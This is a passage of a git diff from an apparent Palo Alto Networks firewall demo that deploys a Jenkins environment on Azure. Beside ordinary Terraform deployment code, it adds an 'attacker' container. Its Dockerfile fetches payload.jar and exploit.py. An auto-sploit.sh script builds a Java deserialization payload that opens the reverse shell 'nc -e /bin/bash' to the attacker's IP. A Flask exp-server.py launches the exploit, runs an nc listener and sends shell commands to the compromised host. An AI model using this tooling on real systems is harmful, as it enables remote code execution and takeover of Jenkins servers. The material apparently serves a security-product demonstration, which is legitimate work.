https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-beanutils-1.8.3.jar -O ~/commons-beanutils-1.8.3.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-collections-3.2.1.jar -O ~/commons-collections-3.2.1.jar -q 
--progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-lang-2.6.jar -O ~/commons-lang-2.6.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-logging-1.2.jar -O ~/commons-logging-1.2.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/ezmorph-1.0.6.jar -O ~/ezmorph-1.0.6.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/json-lib-2.4-jenkins-2.jar -O ~/json-lib-2.4-jenkins-2.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/payload.jar -O ~/payload.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/exploit.py -O ~/exploit.py -q --progress=bar:force:noscroll --show-progress + +EXPOSE 443 5000 + +RUN pip3 install requests flask pexpect + +COPY run.sh /usr/local/bin/run.sh +COPY exp-server.py /root/exp-server.py + +RUN chmod +x /usr/local/bin/run.sh + +COPY auto-sploit.sh /root/auto-sploit.sh + +RUN chmod +x /root/auto-sploit.sh + +USER root + +ENTRYPOINT ["/bin/tini", "--"] +ENV FLASK_APP=/root/exp-server.py + +# CMD ["/usr/local/bin/run.sh"] +CMD ["/usr/local/bin/flask", "run", "--host=0.0.0.0"] diff --git a/azure/Jenkins_proj-working/attacker/auto-sploit.sh b/azure/Jenkins_proj-working/attacker/auto-sploit.sh new file mode 100644 index 00000000..97c6dc3d --- /dev/null +++ b/azure/Jenkins_proj-working/attacker/auto-sploit.sh @@ -0,0 +1,31 @@ +#! /bin/bash + +echo +echo "*******************************************************************" +echo +echo "Open another terminal window and run a netcat listener: nc -lvp 443" +echo +echo "Run the following command to spawn a shell once the reverse connection establishes:" +echo +echo "python -c 'import pty; pty.spawn(\"/bin/bash\")'" +echo +read -n 1 -s -r -p "Once the above is complete - press any key to continue" + +echo +echo "Enter Attacker IP Address:" +echo + +read attacker + +echo "Creating Payload with IP address" $attacker +echo + +java -jar payload.jar payload.ser "nc -e /bin/bash $attacker 443" + +echo "Payload successfully created and saved as 'payload.ser'" +echo + +echo "Executing exploit..." +echo + +python3 exploit.py diff --git a/azure/Jenkins_proj-working/attacker/docker-compose.yml b/azure/Jenkins_proj-working/attacker/docker-compose.yml new file mode 100644 index 00000000..02cdb71b --- /dev/null +++ b/azure/Jenkins_proj-working/attacker/docker-compose.yml @@ -0,0 +1,8 @@ +version: '3' +services: + attacker: + build: . + container_name: attacker + ports: + - "443:443" + - "5000:5000" diff --git a/azure/Jenkins_proj-working/attacker/exp-server.py b/azure/Jenkins_proj-working/attacker/exp-server.py new file mode 100644 index 00000000..19a4a77b --- /dev/null +++ b/azure/Jenkins_proj-working/attacker/exp-server.py @@ -0,0 +1,175 @@ +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. 
+# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +""" +Palo Alto Networks - demo-launcher +Super simple App to expose a RESTful API to launch a couple of scripts +This software is provided without support, warranty, or guarantee. +Use at your own risk. +""" + +import pexpect +from flask import Flask +from flask import request +import os +import time + +app = Flask(__name__) + + +@app.route("/") +def hello(): + return "Good Day!" + + +@app.route("/launch", methods=['POST']) +def launch_sploit(): + """ + Accepts a JSON payload with the following structure: + { + "target": "nlb-something.fqdn.com", + "attacker": "1.2.3.4" + } + If the payload parses correctly, then launch a reverse shell listener using pexpect.spawn + then spawn the auto-sploit.sh tool and enter the target and attacker info again using pexpect + :return: Simple String response for now + """ + if request.is_json: + print(request.data) + payload = request.get_json() + print(request.mimetype) + print(request.content_type) + print(request.accept_mimetypes) + print(payload) + print(type(payload)) + target_ip = payload.get('target', '') + attacker_ip = payload.get('attacker', '') + if target_ip == "" or attacker_ip == "": + print('Payload is all wrong!') + print(request.payload) + return 'ERROR' + + exe = '/root/auto-sploit.sh' + if not os.path.exists(exe): + return 500, 'launch script does not exist' + + print('Launching auto-sploit.sh') + child = pexpect.spawn('/root/auto-sploit.sh') + child.delaybeforesend = 2 + found_index = child.expect(['press any key to continue', pexpect.EOF, pexpect.TIMEOUT]) + if found_index == 0: + print('launching listener process') + _launch_listener() + child.send('\n') + else: + return 'ERROR - Could not press key to continue' + + found_index = child.expect(['Enter Attacker IP Address', pexpect.EOF, pexpect.TIMEOUT]) + if found_index == 0: + print('Sending attacker ip :::' + attacker_ip + ':::') + child.sendline(attacker_ip) + else: + return 'ERROR - Could not enter attacker IP' + + found_index = child.expect(['Enter Jenkins Target IP Address', pexpect.EOF, pexpect.TIMEOUT]) + if found_index == 0: + print(child.before) + print('Sending target ip') + child.sendline(target_ip) + else: + print(child.before) + return 'ERROR - Could not enter jenkins IP' + + found_index = child.expect(['pwn', pexpect.EOF, pexpect.TIMEOUT]) + if found_index == 0: + print('PWN') + print(child) + time.sleep(2) + return 'SUCCESS - auto-sploit launched!' 
+ + else: + return 'No Bueno - No JSON payload detected' + + +@app.route("/send", methods=['POST']) +def send_cmd(): + if request.is_json: + data = request.get_json() + cli = data.get('cli', '') + if cli == '': + return 'No Bueno - Invalid JSON payload' + + if 'listener' in app.config: + print('We have a listener already up!') + listener = app.config.get('listener', '') + if not hasattr(listener, 'isalive') or not listener.isalive(): + return 'No Bueno - Listener does not appear to be active' + + print('Sending initial command to see where we are!') + listener.sendline('echo $SHLVL\n') + found_index = listener.expect(['1', 'jenkins@', 'root@', pexpect.EOF, pexpect.TIMEOUT]) + print(found_index) + if found_index == 0: + # no prompt yet + print('Great, trying to get a prompt now') + listener.sendline("python -c 'import pty; pty.spawn(\"/bin/bash\")'") + + if found_index > 2: + print(listener.before) + return 'Someting is wrong with the listener connection!' + + # listener.sendline(cli) + # print(listener) + found_index = listener.expect(['jenkins@.*$', 'root@.*#', pexpect.EOF, pexpect.TIMEOUT]) + print('Found index is now: ' + str(found_index)) + if found_index > 1: + print(listener) + return 'Someting is wrong with the listener connection!' + listener.sendline(cli) + found_index = listener.expect(['jenkins@.*$', 'root@.*#', pexpect.EOF, pexpect.TIMEOUT]) + print('Found index after cli is now: ' + str(found_index)) + if found_index > 1: + print(listener) + return 'Someting is wrong with the listener connection!' + print(listener) + return listener.before + + else: + return 'NOPE' + else: + return 'NOWAYJOSE' + + +def _launch_listener(): + if 'listener' not in app.config: + listener = pexpect.spawn('nc -lvp 443') + found_index = listener.expect(['listening', pexpect.EOF, pexpect.TIMEOUT]) + if found_index != 0: + return False + app.config['listener'] = listener + print('Launched and ready to rock') + return True + else: + listener = app.config['listener'] + if hasattr(listener, 'isalive') and listener.isalive(): + return True + else: + listener = pexpect.spawn('nc -lvp 443') + found_index = listener.expect(['listening', pexpect.EOF, pexpect.TIMEOUT]) + if found_index != 0: + return False + app.config['listener'] = listener + return True + + diff --git a/azure/Jenkins_proj-working/attacker/run.sh b/azure/Jenkins_proj-working/attacker/run.sh new file mode 100644 index 00000000..bc9b9de7 --- /dev/null +++ b/azure/Jenkins_proj-working/attacker/run.sh @@ -0,0 +1,11 @@ +#! /bin/bash -e + +# Running nc on an unexposed port to keep the container up + +if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then + + exec nc -l -p 56789 "$@" + +fi + +exec "$@" diff --git a/azure/Jenkins_proj-working/azure_login.py b/azure/Jenkins_proj-working/azure_login.py new file mode 100644 index 00000000..bbe85a41 --- /dev/null +++ b/azure/Jenkins_proj-working/azure_login.py @@ -0,0 +1,10 @@ +from azure import cli +from azure.cli.core import get_default_cli +import sys + +sys.sterr = sys.stdout + +print('Logging in to Azure using device code') + +get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout) +pass \ No newline at end of file diff --git a/azure/Jenkins_proj-working/deploy-v2.html b/azure/Jenkins_proj-working/deploy-v2.html new file mode 100644 index 00000000..123a542a --- /dev/null +++ b/azure/Jenkins_proj-working/deploy-v2.html @@ -0,0 +1,185 @@ + +Python: module deploy-v2 + + + + + +
 
+Python module documentation: deploy-v2
+index: /Users/jharris/Documents/PycharmProjects/terraform/azure/Jenkins_proj-master/deploy-v2.py
+
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage
+
+python deploy.py -u <fwusername> -p <fwpassword> -r <resource group> -j <region>
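The option skeleton above can also be driven programmatically. Below is a minimal, hypothetical sketch of calling the documented main(username, password, rg_name, azure_region) entry point directly from Python; every argument value is a placeholder, and importlib is used only because the hyphenated file name deploy-v2.py cannot be imported with a plain import statement.

    # Hypothetical driver for the documented main(username, password, rg_name, azure_region).
    # All argument values below are placeholders, not values from this repository.
    import importlib.util

    spec = importlib.util.spec_from_file_location("deploy_v2", "deploy-v2.py")
    deploy_v2 = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(deploy_v2)          # runs the module-level logging setup only

    deploy_v2.main(
        username="fwadmin",                     # firewall admin username (placeholder)
        password="ChangeMe123!",                # firewall admin password (placeholder)
        rg_name="jenkins-demo",                 # resource group name prefix
        azure_region="centralus",               # Azure region
    )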
 
+Modules
+    xml.etree.ElementTree, argparse, pandevice.firewall, json, logging, os,
+    requests, subprocess, sys, time, urllib3, uuid, xmltodict
+
+Classes
+    builtins.Exception(builtins.BaseException)
+        DeployRequestException
+
+class DeployRequestException(builtins.Exception)
+    Common base class for all non-exit exceptions.
+    Method resolution order: DeployRequestException, builtins.Exception,
+    builtins.BaseException, builtins.object
+    (No methods or data descriptors of its own; everything is inherited from
+    builtins.Exception and builtins.BaseException.)
+
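DeployRequestException adds no behaviour of its own; it exists so that callers of the send_request() helper defined in deploy.py (documented in the Functions section below) can keep polling while the firewall is booting or rebooting. A minimal sketch of that retry pattern, consistent with the loops in deploy.py further down this diff; the attempt count and delay are illustrative only:

    import time

    def wait_for_http_200(url, attempts=20, delay=30):
        # Poll with send_request() until we get a usable response; send_request()
        # raises DeployRequestException on connection errors, timeouts and HTTP
        # error statuses (anything outside the 200-399 range).
        for _ in range(attempts):
            try:
                return send_request(url)
            except DeployRequestException:
                time.sleep(delay)   # firewall may still be rebooting; back off and retry
        raise DeployRequestException("no response after {} attempts".format(attempts))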
 
+Functions
+    apply_tf(working_dir, vars, description)
+        Handles terraform operations and returns variables in outputs.tf as a dict.
+        :param working_dir: Directory that contains the tf files
+        :param vars: Additional variables passed in to override defaults (equivalent to -var)
+        :param description: Description of the deployment for logging purposes
+        :return: return_code - 0 for success or other for failure
+                 outputs - Dictionary of the terraform outputs defined in the outputs.tf file
+
+    create_azure_fileshare(share_prefix, account_name, account_key)
+        Generates a unique share name to avoid overlaps in shared infra.
+        :param share_prefix:
+        :param account_name:
+        :param account_key:
+        :return:
+
+    getApiKey(hostname, username, password)
+        Generates a Palo Alto Networks API key from username and password credentials.
+        :param hostname: IP address of firewall
+        :param username:
+        :param password:
+        :return: api_key - API key for firewall
+
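getApiKey() wraps the standard PAN-OS keygen request. The sketch below shows the bare request/parse cycle it performs, using only the requests and ElementTree imports already present in deploy.py; the helper name fetch_api_key is hypothetical, and certificate verification is disabled here just as in the real helper, which is acceptable only against a disposable lab firewall.

    import xml.etree.ElementTree as ET
    import requests

    def fetch_api_key(hostname, username, password):
        # PAN-OS keygen endpoint; a successful reply looks like
        # <response status="success"><result><key>...</key></result></response>
        url = "https://{}/api/?type=keygen&user={}&password={}".format(hostname, username, password)
        r = requests.get(url, verify=False, timeout=10)
        r.raise_for_status()
        return ET.XML(r.content)[0][0].text     # the <key> element, parsed the same way getApiKey() does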
+    getFirewallStatus(fwIP, api_key)
+
+    getServerStatus(IP)
+        Gets the server status by sending an HTTP request and checking for a 200 response code.
+
+    main(username, password, rg_name, azure_region)
+        Main function
+        :param username:
+        :param password:
+        :param rg_name: Resource group name prefix
+        :param azure_region: Region
+        :return:
+
+    send_request(call)
+        Handles sending requests to the API.
+        :param call: url
+        :return: Returns result of call. Will return response for codes between 200 and 400.
+                 If a 200 response code is required, check the value in the response.
+
+    update_fw(fwMgtIP, api_key)
+        Applies latest AppID, Threat and AV updates to firewall after launch.
+        :param fwMgtIP: Firewall management IP
+        :param api_key: API key
+
+    update_status(key, value)
+        For tracking purposes. Writes responses to file.
+        :param key:
+        :param value:
+        :return:
+
+    walkdict(d, key)
+        Finds a key in a dict or nested dict and returns the value associated with it.
+        :param d: dict or nested dict
+        :param key: key value
+        :return: value associated with key
+
+    write_status_file(message_dict)
+        Writes the deployment state to a dict and outputs to file for status tracking.
+
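walkdict() is how the deployment code pulls a PAN-OS job id out of the nested OrderedDict that xmltodict produces. A small illustration with a trimmed, made-up API reply; walkdict itself is the helper defined in deploy.py later in this diff:

    from collections import OrderedDict
    import xmltodict

    # Shortened, hypothetical PAN-OS reply of the kind update_fw() receives.
    sample = '<response status="success"><result><job>42</job></result></response>'

    # Force OrderedDict explicitly, since walkdict() only recurses into OrderedDict values.
    parsed = xmltodict.parse(sample, dict_constructor=OrderedDict)
    print(walkdict(parsed, 'job'))    # -> '42'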
 
+Data
+    formatter = <logging.Formatter object>
+    handler = <StreamHandler <stderr> (NOTSET)>
+    logger = <RootLogger root (INFO)>
+    status_output = {}
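The full deploy.py source follows. As a quick orientation, this is roughly how its apply_tf() wrapper is invoked and how the Terraform outputs it returns are read back; the directory, variables and output keys mirror the WebInDeploy step but are shown purely as an illustration with placeholder values.

    # Illustrative only: one Terraform step driven through apply_tf() from deploy.py.
    deploy_vars = {
        'Admin_Username': 'fwadmin',        # placeholder credentials
        'Admin_Password': 'ChangeMe123!',
        'Azure_Region': 'centralus',
    }

    return_code, outputs = apply_tf('./WebInDeploy', deploy_vars, 'WebInDeploy')
    if return_code != 0:
        raise SystemExit('WebInDeploy failed')

    # Each output entry is a dict with a 'value' key, as in the real main() below.
    fw_mgmt_ip = outputs['MGT-IP-FW-1']['value']
    alb_dns = outputs['ALB-DNS']['value']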
+ \ No newline at end of file diff --git a/azure/Jenkins_proj-working/deploy.py b/azure/Jenkins_proj-working/deploy.py new file mode 100644 index 00000000..ee691764 --- /dev/null +++ b/azure/Jenkins_proj-working/deploy.py @@ -0,0 +1,730 @@ +#!/usr/bin/env python3 +""" +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +# Author: Justin Harris jharris@paloaltonetworks.com + +Usage + +python deploy.py --username -p -r -j + +""" + +import argparse +import json +import logging +import os +import subprocess +import sys +import time +import uuid +import xml.etree.ElementTree as ET +import xmltodict +import requests +import urllib3 + +from azure.common import AzureException +from azure.storage.file import FileService + + +from pandevice import firewall +from python_terraform import Terraform +from collections import OrderedDict + + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +_archive_dir = './WebInDeploy/bootstrap' +_content_update_dir = './WebInDeploy/content_updates/' + +logging.basicConfig(level=logging.INFO) +logger = logging.getLogger() +handler = logging.StreamHandler() +formatter = logging.Formatter('%(levelname)-8s %(message)s') +handler.setFormatter(formatter) +logger.addHandler(handler) + + +# global var to keep status output +status_output = dict() + + +def send_request(call): + + """ + Handles sending requests to API + :param call: url + :return: Retruns result of call. Will return response for codes between 200 and 400. + If 200 response code is required check value in response + """ + headers = {'Accept-Encoding' : 'None', + 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) ' + 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + + try: + r = requests.get(call, headers = headers, verify=False, timeout=5) + r.raise_for_status() + except requests.exceptions.HTTPError as errh: + ''' + Firewall may return 5xx error when rebooting. 
Need to handle a 5xx response + ''' + logger.debug("DeployRequestException Http Error:") + raise DeployRequestException("Http Error:") + except requests.exceptions.ConnectionError as errc: + logger.debug("DeployRequestException Connection Error:") + raise DeployRequestException("Connection Error") + except requests.exceptions.Timeout as errt: + logger.debug("DeployRequestException Timeout Error:") + raise DeployRequestException("Timeout Error") + except requests.exceptions.RequestException as err: + logger.debug("DeployRequestException RequestException Error:") + raise DeployRequestException("Request Error") + else: + return r + + +class DeployRequestException(Exception): + pass + +def walkdict(dict, match): + """ + Finds a key in a dict or nested dict and returns the value associated with it + :param d: dict or nested dict + :param key: key value + :return: value associated with key + """ + for key, v in dict.items(): + if key == match: + jobid = v + return jobid + elif isinstance(v, OrderedDict): + found = walkdict(v, match) + if found is not None: + return found + + + +def update_fw(fwMgtIP, api_key): + """ + Applies latest AppID, Threat and AV updates to firewall after launch + :param fwMgtIP: Firewall management IP + :param api_key: API key + + """ + # # Download latest applications and threats + + type = "op" + cmd = "" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + getjobid = 0 + jobid = '' + key = 'job' + + # FIXME - Remove Duplicate code for parsing jobid + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + # FIXME - Remove Duplicate code for showing job status + + completed = 0 + while (completed == 0): + time.sleep(45) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + try: + r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException + logger.debug("failed to get jobid this time. Try again") + else: + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP download Complete ") + completed = 1 + print("Download latest Applications and Threats update") + status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Checking job is complete') + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 + + # Install latest content update + type = "op" + cmd = "latestno" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + getjobid = 0 + jobid = '' + key = 'job' + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. 
Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + completed = 0 + while (completed == 0): + time.sleep(45) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + try: + r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException + logger.debug("failed to get jobid this time. Try again") + else: + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP Install Complete ") + completed = 1 + print("Install latest Applications and Threats update") + status = "APP+TP Install Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Checking job is complete') + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 + + + # Download latest anti-virus update without committing + getjobid = 0 + jobid = '' + type = "op" + cmd = "" + key = 'job' + while getjobid == 0: + try: + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + r = send_request(call) + logger.info('Got response to request AV install {}'.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + completed = 0 + while (completed == 0): + time.sleep(45) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( + fwMgtIP, jobid, api_key) + r = send_request(call) + tree = ET.fromstring(r.text) + logger.debug('Got response for show job {}'.format(r.text)) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.info("AV install Status Complete ") + completed = 1 + else: + status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 + + +def getApiKey(hostname, username, password): + + """ + Generates a Paloaltonetworks api key from username and password credentials + :param hostname: Ip address of firewall + :param username: + :param password: + :return: api_key API key for firewall + """ + + + call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password) + + api_key = "" + while True: + try: + # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read() + response = send_request(call) + + + except DeployRequestException as updateerr: + logger.info("No response from FW. 
Wait 20 secs before retry") + time.sleep(10) + continue + + else: + api_key = ET.XML(response.content)[0][0].text + logger.info("FW Management plane is Responding so checking if Dataplane is ready") + logger.debug("Response to get_api is {}".format(response)) + return api_key + + +def getFirewallStatus(fwIP, api_key): + fwip = fwIP + + """ + Gets the firewall status by sending the API request show chassis status. + :param fwMgtIP: IP Address of firewall interface to be probed + :param api_key: Panos API key + """ + + url = "https://%s/api/?type=op&cmd=&key=%s" % (fwip, api_key) + # Send command to fw and see if it times out or we get a response + logger.info("Sending command 'show chassis status' to firewall") + try: + response = requests.get(url, verify=False, timeout=10) + response.raise_for_status() + except requests.exceptions.Timeout as fwdownerr: + logger.debug("No response from FW. So maybe not up!") + return 'no' + # sleep and check again? + except requests.exceptions.HTTPError as fwstartgerr: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + raise_for_status() throws HTTPError for error responses + ''' + logger.infor("Http Error: {}: ".format(fwstartgerr)) + return 'cmd_error' + except requests.exceptions.RequestException as err: + logger.debug("Got RequestException response from FW. So maybe not up!") + return 'cmd_error' + else: + logger.debug("Got response to 'show chassis status' {}".format(response)) + + resp_header = ET.fromstring(response.content) + logger.debug('Response header is {}'.format(resp_header)) + + if resp_header.tag != 'response': + logger.debug("Did not get a valid 'response' string...maybe a timeout") + return 'cmd_error' + + if resp_header.attrib['status'] == 'error': + logger.debug("Got an error for the command") + return 'cmd_error' + + if resp_header.attrib['status'] == 'success': + # The fw responded with a successful command execution. So is it ready? + for element in resp_header: + if element.text.rstrip() == 'yes': + logger.info("FW Chassis is ready to accept configuration and connections") + return 'yes' + else: + logger.info("FW Chassis not ready, still waiting for dataplane") + time.sleep(10) + return 'almost' + + +def update_status(key, value): + """ + For tracking purposes. Write responses to file. 
+ :param key: + :param value: + :return: + """ + global status_output + + if type(status_output) is not dict: + logger.info('Creating new status_output object') + status_output = dict() + + if key is not None and value is not None: + status_output[key] = value + + # write status to file to future tracking + write_status_file(status_output) + + +def write_status_file(message_dict): + """ + Writes the deployment state to a dict and outputs to file for status tracking + """ + try: + message_json = json.dumps(message_dict) + with open('deployment_status.json', 'w+') as dpj: + dpj.write(message_json) + + except ValueError as ve: + logger.error('Could not write status file!') + print('Could not write status file!') + sys.exit(1) + + +def create_azure_fileshare(share_prefix, account_name, account_key): + """ + Generate a unique share name to avoid overlaps in shared infra + :param share_prefix: + :param account_name: + :param account_key: + :return: + """ + + # FIXME - Need to remove hardcoded directoty link below + + d_dir = './WebInDeploy/bootstrap' + share_name = "{0}-{1}".format(share_prefix.lower(), str(uuid.uuid4())) + print('using share_name of: {}'.format(share_name)) + + # archive_file_path = _create_archive_directory(files, share_prefix) + + try: + # ignore SSL warnings - bad form, but SSL Decrypt causes issues with this + s = requests.Session() + s.verify = False + + file_service = FileService(account_name=account_name, account_key=account_key, request_session=s) + + # print(file_service) + if not file_service.exists(share_name): + file_service.create_share(share_name) + + for d in ['config', 'content', 'software', 'license']: + print('creating directory of type: {}'.format(d)) + if not file_service.exists(share_name, directory_name=d): + file_service.create_directory(share_name, d) + + # FIXME - We only handle bootstrap files. May need to handle other dirs + + if d == 'config': + for filename in os.listdir(d_dir): + print('creating file: {0}'.format(filename)) + file_service.create_file_from_path(share_name, d, filename, os.path.join(d_dir, filename)) + + except AttributeError as ae: + # this can be returned on bad auth information + print(ae) + return "Authentication or other error creating bootstrap file_share in Azure" + + except AzureException as ahe: + print(ahe) + return str(ahe) + except ValueError as ve: + print(ve) + return str(ve) + + print('all done') + return share_name + + +def getServerStatus(IP): + """ + Gets the server status by sending an HTTP request and checking for a 200 response code + + """ + global gcontext + + call = ("http://" + IP + "/") + logger.info('URL request is {}'.format(call)) + # Send command to fw and see if it times out or we get a response + count = 0 + max_count = 12 + while True: + if count < max_count: + time.sleep(10) + try: + count = count + 1 + r = send_request(call) + except DeployRequestException as e: + logger.debug("Got Invalid response".format(e)) + else: + logger.info('Jenkins Server responded with HTTP 200 code') + return 'server_up' + else: + break + return 'server_down' + + +def apply_tf(working_dir, vars, description): + + """ + Handles terraform operations and returns variables in outputs.tf as a dict. 
+ :param working_dir: Directory that contains the tf files + :param vars: Additional variables passed in to override defaults equivalent to -var + :param description: Description of the deployment for logging purposes + :return: return_code - 0 for success or other for failure + outputs - Dictionary of the terraform outputs defined in the outputs.tf file + + """ + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # Class Terraform uses subprocess and setting capture_output to True will capture output + capture_output = kwargs.pop('capture_output', False) + + if capture_output is True: + stderr = subprocess.PIPE + stdout = subprocess.PIPE + else: + # if capture output is False, then everything will essentially go to stdout and stderrf + stderr = sys.stderr + stdout = sys.stdout + + start_time = time.asctime() + print('Starting Deployment at {}\n'.format(start_time)) + + # Create Bootstrap + + tf = Terraform(working_dir=working_dir) + + tf.cmd('init') + if run_plan: + + # print('Calling tf.plan') + tf.plan(capture_output=False) + + return_code, stdout, stderr = tf.apply(vars = vars, capture_output = capture_output, + skip_plan = True, **kwargs) + outputs = tf.output() + + logger.debug('Got Return code {} for deployment of {}'.format(return_code, description)) + + return (return_code, outputs) + + +def main(username, password, rg_name, azure_region): + + """ + Main function + :param username: + :param password: + :param rg_name: Resource group name prefix + :param azure_region: Region + :return: + """ + username = username + password = password + + WebInBootstrap_vars = { + 'RG_Name': rg_name, + 'Azure_Region': azure_region + } + + WebInDeploy_vars = { + 'Admin_Username': username, + 'Admin_Password': password, + 'Azure_Region': azure_region + } + + WebInFWConf_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # + return_code, outputs = apply_tf('./WebInBootstrap',WebInBootstrap_vars, 'WebInBootstrap') + + if return_code == 0: + share_prefix = 'jenkins-demo' + resource_group = 